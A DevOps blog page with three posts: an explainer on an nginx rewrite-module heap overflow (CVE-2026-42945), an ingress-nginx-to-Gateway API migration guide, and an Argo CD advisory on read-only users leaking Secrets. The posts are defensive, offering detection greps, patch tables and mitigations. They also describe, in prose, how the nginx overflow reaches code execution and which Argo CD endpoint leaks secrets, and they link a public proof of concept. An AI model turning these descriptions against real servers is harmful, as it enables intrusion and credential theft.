DevOps Daily

NGINX Rift (CVE-2026-42945): The 18-Year-Old Rewrite Bug That Hands an Attacker Your Worker Process

DevOps Daily Team — Thu, 14 May 2026 12:30:00 GMT

On May 13, 2026, F5 published K000161019 and the security advisories list at nginx.org picked up a new entry. The bug, branded "NGINX Rift" by its discoverer and tracked as CVE-2026-42945, is a heap buffer overflow in the rewrite module that has been sitting in ngx_http_script.c since the 0.6.27 release in 2008. Every nginx release between then and 1.30.0 is vulnerable. So is NGINX Plus through R36. So is every F5 product that ships nginx internally, including their commercial Ingress Controller, App Protect WAF, and Instance Manager.

A working remote code execution PoC is public on GitHub. There is no in-the-wild exploitation reported as of this morning, but the PoC repository is small enough to read in one sitting and the exploit primitive is deterministic. The clock is short.

This post covers what the bug actually is, the one-line grep that tells you whether your config is exploitable (because the F5 advisory's "vulnerable" framing is broader than your actual exposure), the patch matrix across distros, and the long tail of OpenResty, Kong, APISIX, and other downstream products that have no advisory yet but ship the same vulnerable code.

TL;DR

CVE-2026-42945, CVSS v4 9.2 / v3 8.1. Heap buffer overflow in ngx_http_rewrite_module reachable by an unauthenticated HTTP request against any nginx running a vulnerable rewrite pattern.
Affected: NGINX Open Source 0.6.27 through 1.30.0; NGINX Plus R32 through R36; F5 NGINX Ingress Controller 3.5.0-5.4.1, NGINX App Protect WAF 4.x and 5.x, NGINX Gateway Fabric, NGINX Instance Manager. OpenResty, Tengine, Angie, FreeNGINX, Kong, APISIX and the Kubernetes ingress-nginx project all ship the same ngx_http_script.c and should be treated as vulnerable until their maintainers ship a patched release.
Fixed in: nginx 1.31.0 (mainline) and 1.30.1 (stable). NGINX Plus R36 P4, R35 P2, R32 P6.
The trigger is operator-written config, not attacker-controlled config. A rewrite directive whose replacement contains ? and uses an unnamed capture ($1, $2, etc.) referenced again by set, if, or a subsequent rewrite is enough. The attacker just sends one HTTP request with the right URL.
Successful exploitation lands code execution as the nginx worker user (often www-data or nginx). Workers hold the TLS private key in memory and serve responses, so even non-root worker access is a serious incident.
Detection: there are no published WAF rules from Cloudflare, AWS, or OWASP CRS yet. Grep your own configs. The one-liner is below.

Prerequisites

Shell access to any host that runs nginx, or to a Kubernetes cluster running an nginx-based ingress controller.
The nginx config tree (/etc/nginx/, or your container image's equivalent).
Patience for one round of grep followed by either a package upgrade or a config audit.

What the bug actually is

The rewrite module compiles every rewrite, set, if, and return directive into a small bytecode that runs once per request. The compiler produces two code arrays: a "length" array that calculates how many bytes the rewritten string will occupy, and a "value" array that actually writes those bytes.

Two state bits flow through this machine. One is is_args, which records whether the rewrite has crossed into the query-string portion of the URL. The other is the destination buffer pointer. The bug is that those two bits get out of sync when the rewrite uses an unnamed PCRE capture and the replacement contains ?.

Concretely, after a rewrite ^/api/(.+) /v2/$1?internal=1 break; runs once, the engine permanently flips is_args=1 on the main script engine. The length pass for the next rewrite (or set, or if referencing $1) runs through a zeroed sub-engine where is_args=0, so the capture-length code returns the raw byte count of $1. The copy pass sees is_args=1 on the main engine and routes the same bytes through ngx_escape_uri, which expands characters like +, %, &, and space into their percent-encoded forms. The destination buffer was sized for the raw count, so the expanded bytes write past the end of the allocation.

The corruption lands in the request pool. With cross-request heap shaping, the PoC walks the overflow into the ngx_pool_cleanup_t handler pointer and gets system() called with attacker-controlled arguments. Worker code execution follows. All the technical detail is in the depthfirst writeup and the fix commit.

Two important details for operators:

This is not a config-poisoning bug. Some vulnerability writeups make a bug sound less serious by noting it requires attacker-controlled nginx.conf. This one does not. Vulnerable configs are operator-written, common in API-gateway and reverse-proxy deployments, and the attacker only needs to send an HTTP request.
nginx -t does not flag the pattern. The vulnerable config is syntactically valid. There is no warning from the standard config check. You have to grep.

Find vulnerable configs in your tree

The dangerous pattern needs three things together: a rewrite whose replacement contains ?, the replacement contains an unnamed capture ($1 through $9), and the same capture is read by a later rewrite, set, or if in the same server or location block.

The fast heuristic is a regex against your full config tree:

# List rewrite directives whose replacement carries both '?' and a $N capture.
grep -RHnE 'rewrite[[:space:]]+[^;]+\$[1-9][^;]*\?|rewrite[[:space:]]+[^;]+\?[^;]*\$[1-9]' /etc/nginx/ 2>/dev/null

That gives you the candidate rewrite lines. From there, walk the server and location blocks each lives in and confirm whether any set $foo $1, if ($1 = "..."), or a second rewrite references the same capture. Those are the exploitable combinations.

If you run nginx inside Kubernetes via ingress-nginx, the same grep against the generated config inside the controller pod is the answer:

kubectl -n ingress-nginx exec -ti deploy/ingress-nginx-controller -- \
  sh -c "cat /etc/nginx/nginx.conf | grep -nE 'rewrite[[:space:]]+[^;]+\\\$[1-9][^;]*\\?'"

The generated config aggregates every Ingress's annotations into one file. Snippets, rewrite-target, and configuration-snippet are the common sources.

If the grep is empty across your entire fleet, you are not currently exploitable. Upgrade anyway, because the next config change a developer pushes may add a vulnerable pattern, and you would rather not be running a binary whose CVE you already shrugged off.

The patch matrix

+--------------------------------+-------------------------------------+
| Software                       | Patched version                     |
+--------------------------------+-------------------------------------+
| nginx (mainline)               | 1.31.0                              |
| nginx (stable)                 | 1.30.1                              |
| NGINX Plus R36                 | R36 P4                              |
| NGINX Plus R35                 | R35 P2                              |
| NGINX Plus R32                 | R32 P6                              |
| F5 NGINX Ingress Controller    | 5.4.2 (when released)               |
| F5 NGINX App Protect WAF       | 4.16.1 / 5.8.1 (when released)      |
| F5 NGINX Gateway Fabric        | 2.5.2 (when released)               |
| F5 NGINX Instance Manager      | 2.21.2 (when released)              |
| OpenResty                      | No advisory yet                     |
| Tengine, Angie, FreeNGINX      | No advisory yet                     |
| Kong, APISIX                   | No advisory yet                     |
| Kubernetes ingress-nginx       | Retired, no patch coming            |
+--------------------------------+-------------------------------------+

Distro status as of this morning (2026-05-14):

Debian (tracker): bullseye, bookworm, trixie, forky all show vulnerable. Only sid has the fixed 1.30.0-3 package landed.
AlmaLinux: backport for 8, 9, and 10 published in the testing repos using the upstream patch. Worth pulling if you cannot wait for RHEL.
RHEL, Ubuntu, Alpine: no published advisories yet.

The Kubernetes ingress-nginx line is the one to flag for your platform team. That project went EOL in March 2026 and there is no maintainer left to ship a patched container image. If you are still on it, this is the second CVE in nine days where the answer is "there is no patch coming, plan the Gateway API migration." We covered that migration in a separate post.

If you cannot patch in the next 24 hours

There is no published WAF rule from Cloudflare's managed set, AWS WAF managed rules, or the OWASP Core Rule Set as of this morning. A custom rule that drops URLs containing combinations of percent-encoded bytes and unencoded special characters can blunt the most obvious PoC, but the underlying primitive is broad and the attacker can vary their input shape considerably.

The realistic short-term mitigations:

Audit and edit the vulnerable rewrite blocks. If a rewrite line carries the dangerous pattern and you can rewrite it without the ? or the unnamed capture, do that. Most API-gateway rewrites can move the query-string concatenation into a set $args ... statement instead of stuffing it into the rewrite replacement.
Front nginx with a non-nginx proxy that can drop malformed paths. A separately-deployed Envoy or HAProxy in front of nginx does not magically rescue you, because both proxies forward the URL path unchanged by default. But you can add path-normalisation or path-length limits at the front proxy that make exploitation harder. This buys time, not safety.
Run workers under a tightly scoped systemd unit. NoNewPrivileges=yes, ProtectSystem=strict, ProtectHome=yes, PrivateTmp=yes, RestrictAddressFamilies=AF_UNIX AF_INET AF_INET6, SystemCallFilter=@system-service, and especially MemoryDenyWriteExecute=yes. None of these stop the corruption, but MemoryDenyWriteExecute=yes plus the RestrictAddressFamilies line break the PoC's preferred follow-up of dropping a shell. You still want to upgrade.

Removing the rewrite module entirely at build time is possible (./configure --without-http_rewrite_module) but breaks more than it fixes for most deployments.

What to watch in your logs

There is no canonical detection signature yet. The PoC needs to send a stream of requests to shape the heap before the trigger request arrives, so a spike in same-prefix requests from one source to URLs that hit your rewrite blocks is the kind of pattern that should raise eyebrows. Two queries worth running over the last week's access logs:

# Many requests to the same URL prefix from the same source in a short window
awk '{print $1, $7}' /var/log/nginx/access.log \
  | sort | uniq -c | sort -rn | head -50

# Requests where the path contains long sequences of percent-encoded bytes
grep -E '%[0-9A-Fa-f]{2}.*%[0-9A-Fa-f]{2}.*%[0-9A-Fa-f]{2}.*%[0-9A-Fa-f]{2}' \
  /var/log/nginx/access.log | head -50

Neither is specific enough to alert on, but both are good enough for retrospective investigation if you suspect compromise. Combine with worker process crash reports in your system journal (journalctl -u nginx).

The AI-found angle

The bug was found by an autonomous code-audit system run by depthfirst, in a six-hour run on the nginx codebase in April 2026. The same run surfaced four other memory-corruption issues, all of which F5 confirmed. The disclosure timeline was tight (April 18 found, April 21 reported, April 28 working RCE PoC, May 13 advisory), which is roughly the speed an AI-assisted research workflow lets a small team operate at.

The framing matters less than the implication. The codebase that nobody has shipped a critical RCE against in 18 years now has one shipped against it inside a single afternoon of automated review. The cadence of these "old codebase, new CVE" disclosures is going to keep getting faster, and the operational discipline that lets you patch in 24 hours instead of three weeks is going to keep getting more valuable.

Sources

F5 advisory K000161019: my.f5.com/manage/s/article/K000161019
nginx security advisories index: nginx.org/en/security_advisories.html
Fix commit: github.com/nginx/nginx/commit/2046b45aa0c6e712c216b9075886f3f26e9b4ca9
depthfirst writeup: depthfirst.com/research/nginx-rift
PoC repository: github.com/depthfirstdisclosures/nginx-rift
NVD entry: nvd.nist.gov/vuln/detail/CVE-2026-42945
Debian tracker: security-tracker.debian.org/tracker/CVE-2026-42945
AlmaLinux backport: almalinux.org/blog/2026-05-13-nginx-rift-cve-2026-42945
Original disclosure tweet: @IntCyberDigest on X

Grep first. Patch second. Plan the ingress-nginx migration if you have not already.

Ingress-NGINX Is Retired: A Real Migration to Gateway API With ingress2gateway 1.0

DevOps Daily Team — Thu, 14 May 2026 10:00:00 GMT

In November 2025 the Kubernetes project announced that ingress-nginx would retire in March 2026. In January 2026 SIG Network and the Steering Committee confirmed the date and the rationale: only one or two unpaid contributors were left, the snippets annotations were an unmaintainable security surface, and the planned successor project (InGate) had not progressed far enough to be a credible replacement. The same statement cited Datadog telemetry showing that ingress-nginx still ran in roughly 50% of cloud-native clusters.

So you are one of those clusters. The repository is read-only. The container image still pulls, but the next CVE will not get a patch. You need a plan.

This post walks the migration that does not require a flag day. It covers what the EOL actually means, which Gateway API implementation is the right next step for your situation, what ingress2gateway 1.0 translates for you and what it silently drops, and a side-by-side cutover that lets you keep both controllers running until you are confident.

TL;DR

EOL date: March 2026 (the official posts give the month, not a specific day). After EOL there are no further releases, no bugfixes, and no security patches. Existing deployments keep running, the images keep pulling, but new CVEs sit unpatched.
InGate is also retired. The successor project the maintainers had been building never reached production quality and was retired alongside ingress-nginx. The path forward is Gateway API, not InGate.
ingress2gateway 1.0 shipped on 2026-03-20. It translates the well-defined annotations cleanly. It silently drops the dangerous ones: configuration-snippet, server-snippet, auth-snippet, auth-url, session affinity, load-balance. Those need to be rewritten as vendor-specific Gateway API extensions, which differ per controller.
Controller choice: Envoy Gateway, kgateway, Cilium Gateway, Istio Gateway are all conformant with Gateway API v1.4 and all behave close enough to ingress-nginx for a routine workload. The right pick depends on what you already run.
The cutover is shadow Gateway, watch metrics, flip DNS, decommission. Both controllers can run side by side under different ingressClassName / gatewayClassName for as long as you need.

Prerequisites

A cluster currently running ingress-nginx with one or more Ingress resources.
kubectl, jq, and the ingress2gateway CLI (install instructions).
Permission to install a second ingress controller in the cluster (it does not have to be in the same namespace as ingress-nginx).
A DNS provider that supports either weighted records or per-record updates (Route53, Cloudflare, GCP Cloud DNS, similar).

Step 1: Take inventory

The migration plan you actually need is shaped by the annotations you actually use. Start there.

kubectl get ingress -A -o jsonpath='{range .items[*]}{.metadata.namespace}/{.metadata.name}: {.spec.rules[*].host}{"\n"}{end}'

That gives you a list of every Ingress with its hosts. Useful for scoping the migration into batches by team or by hostname. Then dig into the annotations:

kubectl get ingress -A -o json \
  | jq -r '.items[]
      | .metadata as $m
      | (.metadata.annotations // {})
      | to_entries[]
      | "\($m.namespace)/\($m.name)\t\(.key)\t\(.value)"' \
  | grep '^[^\t]*\tnginx.ingress.kubernetes.io/' \
  | sort -k2

This produces a tab-separated table of every nginx annotation in use, grouped by annotation name. The output tells you exactly which features your migration needs to preserve. Save it. You will check it again at the end to confirm nothing got lost.

Pay particular attention to these annotations, which are the ones ingress2gateway does not handle:

nginx.ingress.kubernetes.io/configuration-snippet
nginx.ingress.kubernetes.io/server-snippet
nginx.ingress.kubernetes.io/auth-snippet
nginx.ingress.kubernetes.io/auth-url
nginx.ingress.kubernetes.io/auth-signin
nginx.ingress.kubernetes.io/auth-tls-secret
nginx.ingress.kubernetes.io/session-cookie-name
nginx.ingress.kubernetes.io/load-balance
nginx.ingress.kubernetes.io/upstream-hash-by
nginx.ingress.kubernetes.io/mirror-target

If your output contains any of these, the migration has manual work in it. We will get to what to do with each of them later.

Step 2: Pick a Gateway API controller

There are four serious candidates today, all conformant with Gateway API v1.4. The decision is less about features and more about what you already run.

+---------------------+---------------------------------+-----------------------------+
| Controller          | Best fit when you already       | Watch out for               |
+---------------------+---------------------------------+-----------------------------+
| Envoy Gateway       | You want a clean, focused,      | Newer project, smaller      |
|                     | CNCF-governed Envoy frontend    | community than Istio        |
|                     | with no service mesh baggage    |                             |
| kgateway            | You run Solo.io's Gloo stack,   | License history; verify     |
|                     | want AI/MCP routing primitives  | the kgateway open-source    |
|                     | out of the box                  | story matches your needs    |
| Cilium Gateway      | You already use Cilium for CNI; | Couples L7 routing to your  |
|                     | unified control plane is the    | CNI choice                  |
|                     | win                             |                             |
| Istio Gateway       | You already run Istio for mesh; | Inheriting Istio's full     |
|                     | reuse the existing control      | control plane is a big lift |
|                     | plane                           | if you do not already       |
+---------------------+---------------------------------+-----------------------------+

If none of the "best fit" rows describe you, Envoy Gateway is the conservative default. It is Envoy-based, CNCF-governed, and ships with the lowest surprise count for an operator coming from ingress-nginx.

A note on InGate: it was the project the ingress-nginx maintainers had been positioning as the successor. The November 2025 retirement post explicitly stated InGate "never progressed far enough to create a mature replacement; it will also be retired." Do not migrate to InGate. The path forward is Gateway API with one of the controllers above.

Step 3: Translate Ingress resources with ingress2gateway

ingress2gateway 1.0 shipped on 2026-03-20 with an Emitters framework that produces output tailored to a specific Gateway API controller. The basic invocation against your live cluster:

ingress2gateway print \
  --providers=ingress-nginx \
  -A \
  --emitter envoy-gateway \
  > gateway.yaml

Swap --emitter envoy-gateway for kgateway or standard depending on your target. The standard emitter produces vanilla Gateway API resources with no vendor-specific extensions, which is the right choice if you want to keep the option to switch controllers later.

Output is one or more Gateway, HTTPRoute, and BackendTLSPolicy resources, plus any vendor extensions the emitter knows about. Read the YAML carefully. The tool also emits warnings to stderr for annotations it recognises but cannot translate, and silently drops annotations it does not recognise.

Here is what 1.0 translates cleanly out of the box for the ingress-nginx provider (from the provider README):

canary, canary-by-header, canary-by-header-value, canary-weight, canary-weight-total
rewrite-target (URLRewrite filter, ReplaceFullPath)
app-root, permanent-redirect, temporal-redirect, ssl-redirect
upstream-vhost, connection-proxy-header, x-forwarded-prefix
proxy-connect-timeout, proxy-send-timeout, proxy-read-timeout
proxy-body-size, client-body-buffer-size
backend-protocol (HTTP/HTTPS/GRPC/GRPCS, producing HTTPRoute or GRPCRoute + BackendTLSPolicy)
use-regex
enable-cors and the full CORS annotation set
whitelist-source-range, denylist-source-range
proxy-ssl-verify, proxy-ssl-secret, proxy-ssl-name, proxy-ssl-server-name
TLS via spec.tls[] (Listener with Terminate mode)

Here is what it warns on but does not translate (no Gateway API equivalent yet):

canary-by-header-pattern   (regex header match is not in core Gateway API)
canary-by-cookie           (cookie-based canary not in core)
proxy-redirect-from/-to
custom-headers
proxy-ssl-verify-depth, proxy-ssl-protocols

And here is what it does not even acknowledge (no translation, no warning):

configuration-snippet, server-snippet, auth-snippet
auth-url, auth-signin, auth-tls-secret, auth-response-headers
session-cookie-name and related sticky-session annotations
load-balance (round-robin/ewma/etc.)
upstream-hash-by
mirror-target

That third group is where the actual migration work hides. The first two groups translate or warn; you can review the output and move on. The third group needs case-by-case decisions.

Step 4: Handle the annotations ingress2gateway drops

The Gateway API team did not standardise the snippet annotations on purpose. They were the architectural reason ingress-nginx became unmaintainable. The migration is the moment to write down what each snippet actually does and find a structured replacement.

configuration-snippet, server-snippet, auth-snippet. Each of these injects raw NGINX configuration into the generated config. There is no Gateway API equivalent because the design goal of Gateway API is "no untyped configuration". Identify what each snippet does (custom rate limiting, custom logging, request manipulation, ad-hoc auth) and pick a structured replacement. For Envoy Gateway, that means SecurityPolicy, ClientTrafficPolicy, BackendTrafficPolicy, and EnvoyExtensionPolicy. For kgateway it is TrafficPolicy. For Istio Gateway it is EnvoyFilter (which is itself escape-hatch shaped, but at least typed) plus AuthorizationPolicy.

If a snippet does something that has no clean replacement, this is the moment to ask whether the feature was really earning its keep.

auth-url, auth-signin, auth-tls-secret, auth-response-headers. External auth (the classic "redirect to your OIDC proxy" pattern). Envoy Gateway has SecurityPolicy.extAuth which is the closest one-to-one mapping. kgateway has equivalent functionality in TrafficPolicy. Istio Gateway has AuthorizationPolicy with CUSTOM action. None of these are auto-translated; you have to write the new resource by hand. The good news is the replacement is typed and reviewable, unlike the original annotation.

session-cookie-name and sticky sessions. Gateway API core does not have a sticky-session knob. Every controller has its own vendor extension: Envoy Gateway's BackendTrafficPolicy.sessionPersistence, kgateway's session affinity in TrafficPolicy, Istio's DestinationRule with consistentHash.

load-balance and upstream-hash-by. Same story. Core Gateway API picks a controller-defined algorithm by default (Envoy: weighted round-robin). To force a specific algorithm or consistent hash on a header, use the controller's BackendTrafficPolicy or equivalent.

mirror-target. Gateway API has a RequestMirror filter type that does exactly this, but ingress2gateway does not auto-translate to it. Write it manually as an HTTPRoute.filter of type RequestMirror.

The pattern across all of these: figure out which Gateway API extension type the target controller uses, then write the resource alongside the auto-translated HTTPRoute. None of this is fast, but all of it is mechanical once you have the inventory from step 1.

Step 5: Run both controllers side by side

Do not delete ingress-nginx. Install the new controller alongside it, with a separate GatewayClass and a separate Service LoadBalancer. Both controllers reconcile their own resources independently. There is no conflict as long as you keep the resource types separate (Ingress vs HTTPRoute) and the class names different.

A representative install of Envoy Gateway:

helm install eg oci://docker.io/envoyproxy/gateway-helm \
  --version v1.4.0 \
  -n envoy-gateway-system \
  --create-namespace

kubectl wait --timeout=5m -n envoy-gateway-system \
  deployment/envoy-gateway --for=condition=Available

Then a GatewayClass and a Gateway that gets its own external IP:

apiVersion: gateway.networking.k8s.io/v1
kind: GatewayClass
metadata:
  name: eg
spec:
  controllerName: gateway.envoyproxy.io/gatewayclass-controller
---
apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: production
  namespace: envoy-gateway-system
spec:
  gatewayClassName: eg
  listeners:
    - name: https
      protocol: HTTPS
      port: 443
      tls:
        mode: Terminate
        certificateRefs:
          - name: production-tls
      allowedRoutes:
        namespaces:
          from: All

Apply the gateway.yaml from ingress2gateway and set the HTTPRoute.parentRefs to this Gateway:

apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: api
  namespace: production
spec:
  parentRefs:
    - name: production
      namespace: envoy-gateway-system
  hostnames:
    - api.example.com
  rules:
    - matches:
        - path:
            type: PathPrefix
            value: /
      backendRefs:
        - name: api
          port: 8080

DNS still points at the ingress-nginx Service IP at this stage. The new Gateway has its own IP but no production traffic. You can test it directly with curl --resolve api.example.com:443: https://api.example.com/, which is the cleanest way to validate behaviour before any user-visible change.

Step 6: Validate with metrics, then flip DNS

The Gateway is running and answering synthetic requests. Before any DNS change, run the same Prometheus queries against the new controller that you already run against ingress-nginx, then compare.

The ingress-nginx baseline you already have:

# Request rate per Ingress
sum(rate(nginx_ingress_controller_requests[5m])) by (ingress)

# 5xx rate per Ingress
sum(rate(nginx_ingress_controller_requests{status=~"5.."}[5m])) by (ingress)
/
sum(rate(nginx_ingress_controller_requests[5m])) by (ingress)

# p99 latency per Ingress
histogram_quantile(0.99,
  sum(rate(nginx_ingress_controller_request_duration_seconds_bucket[5m])) by (le, ingress))

The Envoy Gateway equivalents pull from the standard Envoy cluster metrics:

# Request rate per upstream cluster
sum(rate(envoy_cluster_upstream_rq_total[5m])) by (envoy_cluster_name)

# 5xx rate per upstream cluster
sum(rate(envoy_cluster_upstream_rq_xx{envoy_response_code_class="5"}[5m]))
  by (envoy_cluster_name)
/
sum(rate(envoy_cluster_upstream_rq_total[5m])) by (envoy_cluster_name)

# p99 upstream RTT per cluster
histogram_quantile(0.99,
  sum(rate(envoy_cluster_upstream_rq_time_bucket[5m])) by (le, envoy_cluster_name))

For kgateway, Cilium Gateway, and Istio Gateway, the metric names differ; check the controller's metrics documentation. The shape of the queries (rate, by-label, histogram quantile) is the same.

The numbers from the synthetic traffic should match the ingress-nginx baseline within noise. If 5xx jumps on the new controller and not the old one, you have an HTTPRoute translation gap, almost always in the annotation handling. Fix it before flipping DNS.

When the numbers match, shift traffic. The simplest approach is weighted DNS records: 1%, then 5%, then 25%, 50%, 100%. Watch the same dashboards through each step. If you have a CDN or service mesh in front, you can shift by header instead, which is faster to roll back.

Step 7: Decommission

Once DNS has fully cut over and the TTL window has elapsed (plus any CDN cache lifetime), drain ingress-nginx:

# Drop external connectivity first
kubectl -n ingress-nginx patch svc ingress-nginx-controller \
  -p '{"spec":{"type":"ClusterIP"}}'

# Then scale the controller to zero
kubectl -n ingress-nginx scale deploy ingress-nginx-controller --replicas=0

Leave the resources in place for a release cycle in case you need to roll back. The Service-type change costs nothing and removes the LoadBalancer charge while keeping the Ingress objects reachable internally. If everything looks healthy after a week, remove the Helm release.

Rollback path

The reason for the side-by-side install is that rollback at any stage is a DNS change, not a redeploy. If the new controller misbehaves at 25% traffic, push DNS back to 100% ingress-nginx and the world recovers in one TTL cycle. The HTTPRoutes stay in the cluster. You can iterate on them while production is back on the old path.

This is the operational reason "flag day" migrations of ingress controllers are a bad idea. The control plane is two systems, the data plane is two systems, the DNS weight is a knob. Use the knob.

Real-world references

Three migration write-ups worth reading alongside this one:

Pulumi engineering, "How to Move to the Gateway API after ingress-nginx Retirement" (kgateway as the target, January 2026)
Datadog engineering, "Ingress NGINX is EOL: a practical guide for migrating to Kubernetes Gateway API" (the seven-step framework, April 2026)
An engineering team's zero-downtime production write-up (Envoy Gateway, separate LB IPs, WebSocket and gRPC gotchas, March 2026)

None of them publish exact latency numbers, so be wary of any claim that a specific controller is "30% faster" out of the box. The honest answer is "it depends on your routes and your traffic", and your own PromQL during canary is the data you actually want.

Sources

Inventory, translate, run side-by-side, validate with metrics, flip DNS, decommission. The migration is mechanical. The annotation cleanup is where the engineering judgement lives.

Argo CD CVE-2026-42880: When Read-Only Means Read-Everything-Including-Secrets

DevOps Daily Team — Thu, 14 May 2026 09:30:00 GMT

A week ago, on May 7, 2026, the Argo CD project published GHSA-3v3m-wc6v-x4x3. The summary is short: any authenticated Argo CD user, including everyone on the default role:readonly, can pull plaintext Kubernetes Secret values out of any Application that uses ServerSideDiff with the mutation-webhook annotation. CVSS 9.6, scope-changed because the leak crosses the Argo CD trust boundary into etcd.

If you maintain an Argo CD instance shared by more than one team, you almost certainly have read-only users. If you maintain one Application with the IncludeMutationWebhook=true compare option set, that Application's rendered Secrets are visible to every one of those users. Service account tokens, TLS private keys, database credentials, the lot, sitting one API call away.

This post covers the patch matrix, how to find at-risk Applications in your cluster today, what to do if you cannot upgrade immediately, and why this is the second authorization-bypass of this exact shape inside twelve months.

TL;DR

CVE-2026-42880, CVSS 9.6, disclosed 2026-05-07. Affects Argo CD 3.2.0 to 3.2.10 and 3.3.0 to 3.3.8. Fixed in v3.2.11 and v3.3.9. v2.x is not affected.
Any authenticated user with applications, get (the default role:readonly grants this) can call ServerSideDiff and receive unmasked Kubernetes Secret values for any Application that has the annotation argocd.argoproj.io/compare-options containing IncludeMutationWebhook=true.
Detection is a single jq query against kubectl get applications.argoproj.io -A -o json. See below.
If you cannot upgrade today, the practical mitigation is removing IncludeMutationWebhook=true from those annotations. It is safe to remove. Diffs simply revert to filtering out fields injected by mutating webhooks, which is the default ServerSideDiff behavior anyway.
This is the second authorization-bypass disclosure in Argo CD in twelve months. Both leaked through endpoints that forgot to call a redaction helper. Treat role:readonly as "read-everything-including-secrets" until proven otherwise.

Prerequisites

An Argo CD installation on 3.2.x or 3.3.x. Run argocd version (server) or kubectl -n argocd get deploy argocd-server -o jsonpath='{.spec.template.spec.containers[0].image}' to confirm.
kubectl access to the namespace your Applications live in (usually argocd, but the CR can live anywhere).
jq for the one-liner. yq works too if you prefer.

What the bug actually is

ServerSideDiff is the Argo CD feature that asks the Kubernetes API server to do a Server-Side Apply dry-run and then diffs the resulting object against the desired state. It was added in 3.x because it produces more accurate diffs than the older client-side approach, especially when controllers or mutating webhooks add fields to the live object.

The vulnerable code path is the gRPC method application.ApplicationService/ServerSideDiff, exposed over REST as /api/v1/applications/{appName}/resource-tree/diff. The handler at server/application/application.go:3051-3062 constructs its response from the raw PredictedLive and NormalizedLive objects returned by the dry-run, without ever calling hideSecretData().

That helper is what every other diff and state endpoint in Argo CD calls before returning a Secret-shaped object to a client. GetManifests, GetManifestsWithFiles, GetResource, PatchResource, all of them route through it. ServerSideDiff was the one handler that missed it.

The vulnerability needs two conditions:

The caller has applications, get permission. In the shipped role:readonly policy this is wildcard, so every authenticated user has it.
The target Application has the compare option IncludeMutationWebhook=true set on the argocd.argoproj.io/compare-options annotation. Without that flag, a secondary filter called removeWebhookMutation() runs over the response and strips fields injected by mutating webhooks, which incidentally catches the leak. The dangerous combination is ServerSideDiff=true,IncludeMutationWebhook=true in the same annotation value.

What leaks is the rendered Kubernetes Secret as it would appear in etcd. The advisory specifically calls out service account tokens, TLS private keys, database credentials, and API keys. SealedSecrets and ExternalSecrets are not decrypted by Argo CD itself, but the bug leaks the Secret object their controllers produce, which is materially the same outcome from the attacker's perspective.

One nuance worth knowing: the CVSS vector is AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N. PR:L means a valid authenticated session is required. The advisory is correctly framed as "every authenticated user", not "every unauthenticated attacker". For most Argo CD deployments this is a distinction without a difference, since SSO is typically wired up to the whole engineering org.

Find at-risk Applications in your cluster

The fastest way to know whether you are affected is to list every Application whose compare-options annotation contains IncludeMutationWebhook=true:

kubectl get applications.argoproj.io -A -o json \
  | jq -r '.items[]
      | select(.metadata.annotations["argocd.argoproj.io/compare-options"]
      | tostring
      | contains("IncludeMutationWebhook=true"))
      | "\(.metadata.namespace)/\(.metadata.name)"'

This returns one namespace/name per affected Application. Empty output means no Application in the cluster carries the dangerous annotation, but that does not mean you can skip the upgrade. The annotation can also be set globally via the resource.compareoptions field in the argocd-cm ConfigMap:

kubectl -n argocd get cm argocd-cm -o jsonpath='{.data.resource\.compareoptions}'

If that output contains IncludeMutationWebhook=true, every Application in the cluster inherits the dangerous setting, even Applications without their own annotation. The upgrade becomes urgent rather than important.

If you want to know whether the bug has actually been exploited against you, the bad news is there is no dedicated audit field. The Argo CD access log records the gRPC method and the subject from the JWT, so the best you can do is grep historical logs for non-admin subjects calling ServerSideDiff:

kubectl -n argocd logs deploy/argocd-server --tail=1000000 \
  | grep ServerSideDiff \
  | grep -v 'sub=admin'

That gives a noisy but reviewable list. If your subjects are organisation emails or group claims, swap the second grep for the pattern that matches your admins.

The upgrade

The patch is a pure bugfix. The diff adds the existing hideSecretData() call to the ServerSideDiff response builder. There are no new flags, no new defaults, no behavior change for legitimate users beyond the obvious one of no longer seeing plaintext Secret values in diffs. Most teams using ServerSideDiff for legitimate reasons (catching drift introduced by mutating webhooks) get back the same masked diff they already get from every other endpoint.

The version mapping is straightforward:

Argo CD 3.3.x  ->  upgrade to v3.3.9
Argo CD 3.2.x  ->  upgrade to v3.2.11
Argo CD 2.x    ->  not affected, no action needed

If you install via the official Helm chart, the 9.5.x line tracks 3.3.x and pins appVersion v3.3.9 from chart 9.5.11 onward. The 3.2.x line is still served by the older chart majors (8.x). Verify the appVersion mapping on Artifact Hub before pinning a chart version, since the Argo team does not always cut chart releases on the same day as the controller release.

Once the new image is running, the on-the-wire fix is verifiable. Authenticated as a read-only user, call the ServerSideDiff endpoint against an Application that carries IncludeMutationWebhook=true and confirm the response no longer contains data fields populated for Secret resources.

If you cannot upgrade today

Two options buy time. The first is annotation removal:

kubectl -n argocd annotate application  \
  argocd.argoproj.io/compare-options-

Removing the annotation is safe. It reverts to default ServerSideDiff behavior, which filters mutation-webhook-injected fields. The only consequence is that diffs no longer include those fields. If you were depending on seeing them, you were also leaking Secrets to read-only users, so this is the correct fix regardless. To remove the global setting from argocd-cm, edit the ConfigMap and drop IncludeMutationWebhook=true from the resource.compareoptions value.

The second option is RBAC scope-down. The Argo CD argocd-rbac-cm ConfigMap controls who can call which endpoint. The minimum effective change is to stop defaulting users to role:readonly. Edit the policy.default line:

# argocd-rbac-cm
policy.default: ""          # was: role:readonly
policy.csv: |
  # Existing admin role still gets everything
  g, your-admin-group, role:admin

  # New explicit team scope, no wildcard get on applications
  p, role:dev-readonly, applications, list, */*, allow
  p, role:dev-readonly, repositories, get, *, allow
  p, role:dev-readonly, projects, get, *, allow
  g, your-dev-group, role:dev-readonly

This is more disruptive than annotation removal because it changes what the UI shows to unprivileged users. List works, individual application detail does not, which is what stops the ServerSideDiff endpoint cold. Best to combine annotation removal with the RBAC change rather than rely on either alone.

A Kyverno policy can also block new at-risk Applications at admission time:

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: block-include-mutation-webhook
spec:
  validationFailureAction: enforce
  rules:
    - name: deny-include-mutation-webhook
      match:
        any:
          - resources:
              kinds: ["argoproj.io/v1alpha1/Application"]
      validate:
        message: "IncludeMutationWebhook=true leaks Kubernetes Secrets to read-only users (CVE-2026-42880). Remove it or upgrade Argo CD to 3.2.11 / 3.3.9 first."
        pattern:
          metadata:
            =(annotations):
              =(argocd.argoproj.io/compare-options): "!*IncludeMutationWebhook=true*"

